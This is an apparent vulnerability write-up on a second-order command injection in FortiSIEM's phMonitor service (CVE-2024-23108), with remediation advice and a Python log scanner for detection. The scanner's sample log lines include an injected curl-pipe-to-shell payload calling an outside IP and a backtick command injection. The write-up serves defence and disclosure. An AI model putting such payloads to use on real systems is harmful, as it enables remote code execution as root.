Full Report
CVE-2023-34992 was a FortiSIEM command injection vulnerability. The phMonitor service takes in a server_ip variable, which was being used to execute a Python script via os.system, leading to a command injection. The vulnerability was fixed by just validating the IP address being passed in, which solved the immediate issue. Within the same request as the original command injection, there is another field called mount_point. This field is saved and then used in another script when testing the mount. With this, we have a second-order command injection: we first make a request to save the data, then another request to execute the exploit from the saved data. I enjoyed this aspect of the exploit, as second-order bugs are commonly forgotten about. Overall, good bug report :)
Analysis Summary
# Vulnerability: FortiSIEM 2nd Order Command Injection
## CVE Details
- **CVE ID:** CVE-2024-23108 (and related CVE-2024-23109)
- **CVSS Score:** 10.0 (Critical)
- **CWE:** CWE-78 (Improper Neutralization of Special Elements used in an OS Command)
## Affected Systems
- **Products:** Fortinet FortiSIEM
- **Versions:** Releases prior to 7.1.2 build 0160.
- **Configurations:** Systems running the `phMonitor` service (typically listening on TCP/7900).
## Vulnerability Description
This is a second-order command injection vulnerability that arose from an incomplete patch for CVE-2023-34992.
The `phMonitor` service processes `handleStorageRequest` messages. The previous patch added validation for the `server_ip` variable but left the `mount_point` field unsanitized. A first crafted request saves the attacker-controlled `mount_point` value; a later request that tests the mount passes the saved value to a downstream script (`/opt/phoenix/deployment/jumpbox/datastore/nfs/test.py`), whose `__testMount()` function formats it into a shell command string and runs it via `os.system()`. Because `mount_point` is interpolated directly into that shell command, an attacker can inject arbitrary shell commands. The injection is second order because the payload is stored by one request and only executed by a later one.
## Exploitation
- **Status:** PoC available (published by Horizon3.ai on GitHub).
- **Complexity:** Low
- **Attack Vector:** Network (Remote, unauthenticated)
## Impact
- **Confidentiality:** High (Total compromise of the SIEM data)
- **Integrity:** High (Ability to modify logs and system configurations)
- **Availability:** High (Ability to shut down or wipe the SIEM appliance)
- **Note:** Execution occurs with **root** privileges.
## Remediation
### Patches
- **FortiSIEM Version 7.1.2 build 0160** or later.
- Note: Users on the 6.4.x, 6.5.x, 6.6.x and 7.0.x branches should upgrade to the fixed build for their branch as listed in the vendor advisory.
### Workarounds
- Restrict access to the `phMonitor` service port (TCP/7900) to only trusted internal assets.
- Implement strict firewall rules to prevent unauthenticated network access to the management interface of FortiSIEM appliances.
## Detection
- **Indicators of Compromise:** Inspect `/opt/phoenix/logs/phoenix.log` for entries associated with `datastore.py nfs test`.
- **Log Pattern:** Look for shell metacharacters (e.g., `;`, `&`, `|`, `` ` ``) or suspicious strings within the arguments of the `datastore.py` command logged in the system logs.
- **Tools:** Horizon3.ai’s NodeZero platform can be used to scan for and verify this vulnerability.
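The detection rule above, run over sample log lines, as an added example that is not part of the original analysis or of any Horizon3.ai or Fortinet tooling. The sample lines and the `phMonitor: exec ...` layout are constructed for this example; the real `phoenix.log` format may differ, and the scan only relies on the `datastore.py` invocation and its arguments appearing on one line. The metacharacter set extends the page's list (`;`, `&`, `|`, backtick) with `$`, `(`, `)`, `<` and `>`, which also let a shell chain or substitute commands.

```python
import re

# Constructed sample lines in an assumed phoenix.log layout (not real entries).
SAMPLE_PHOENIX_LOG = [
    "2024-02-01 10:00:01 phMonitor: exec /opt/phoenix/deployment/jumpbox/datastore.py nfs test 10.0.0.5 /export/siem",
    "2024-02-01 10:00:05 phMonitor: exec /opt/phoenix/deployment/jumpbox/datastore.py nfs test 10.0.0.5 /export;curl${IFS}198.51.100.7/x|sh",
    "2024-02-01 10:00:09 phMonitor: heartbeat ok",
    "2024-02-01 10:00:12 phMonitor: exec /opt/phoenix/deployment/jumpbox/datastore.py nfs test 10.0.0.5 `id`",
]

# Page lists ; & | and backtick; $ ( ) < > are added because they also let a
# shell chain or substitute commands.
_SHELL_META = re.compile(r"[;&|`$()<>]")
_DATASTORE_CALL = re.compile(r"datastore\.py\s+(?P<args>.*)$")


def find_suspicious_datastore_calls(lines):
    """Returns (line_number, sorted metacharacters, line) for every datastore.py
    invocation whose argument string contains shell metacharacters.
    Lines without a datastore.py call, or with clean arguments, are skipped."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = _DATASTORE_CALL.search(line)
        if match is None:
            continue
        chars = sorted(set(_SHELL_META.findall(match.group("args"))))
        if chars:
            hits.append((number, chars, line.rstrip()))
    return hits


def scan_log_file(path):
    """Streams a log file through the scanner; assumed path on an appliance:
    /opt/phoenix/logs/phoenix.log."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return find_suspicious_datastore_calls(fh)


if __name__ == "__main__":
    for number, chars, line in find_suspicious_datastore_calls(SAMPLE_PHOENIX_LOG):
        print("line %d: metacharacters %s" % (number, "".join(chars)))
        print("  " + line)
```

A clean invocation (line 1) produces no hit because its arguments are an IP and a plain path; a legitimate mount point would not normally contain any of the flagged characters, so a hit is worth a look even when the payload is not obviously a download-and-execute chain.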
## References
- **Vendor Advisory:** [https://fortiguard.fortinet.com/psirt/FG-IR-23-130](https://fortiguard.fortinet.com/psirt/FG-IR-23-130)
- **Technical Analysis:** [https://horizon3.ai/attack-research/disclosures/cve-2024-23108-fortinet-fortisiem-2nd-order-command-injection-deep-dive/](https://horizon3.ai/attack-research/disclosures/cve-2024-23108-fortinet-fortisiem-2nd-order-command-injection-deep-dive/)
- **PoC Repository:** [https://github.com/horizon3ai/CVE-2024-23108](https://github.com/horizon3ai/CVE-2024-23108)